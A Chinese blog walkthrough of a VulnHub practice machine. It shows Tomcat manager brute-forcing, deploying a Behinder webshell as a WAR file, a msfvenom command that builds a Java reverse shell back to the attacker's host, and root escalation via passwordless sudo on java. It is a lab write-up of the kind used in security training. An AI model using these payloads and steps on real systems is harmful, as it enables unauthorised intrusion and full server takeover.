Chen's Blog HomeArchivesTagsCategories
my-Tomcat-vulnhub靶机渗透

前言

my-Tomcat-vulnhub靶机渗透

知识点:

Tomcat 后台爆破

Tomcat 后台部署war木马getshell

渗透过程

靶机IP:192.168.0.17

KaliIP:192.168.0.16

image-20200504024754862

然后访问8080端口

image-20200504025537413

image-20200504092110695

image-20200504092807194

将冰蝎的自带shell.jsp打包成zip,后缀改成war,进后台后

image-20200504092229000

访问,出现这个情况

image-20200504092304191

上传成功,然后使用冰蝎连接。

sudo -l

image-20200504092358385

java程序是有免密的root权限

那么我们使用java进行反弹shell,生成payload

1
msfvenom -p java/shell_reverse_tcp lhost=192.168.0.16 lport=1234 -f jar > test.jar

然后在冰蝎中上传这个shell

image-20200504092649939

终端中执行以下操作

1
2
cd /tmp
sudo /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar test.jar

kali监听的1234端口反弹成功,获取root权限

image-20200504092836425

Author: 我是小吴啦
Link: http://yoursite.com/2020/05/04/my-Tomcat-vulnhub%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
靶机渗透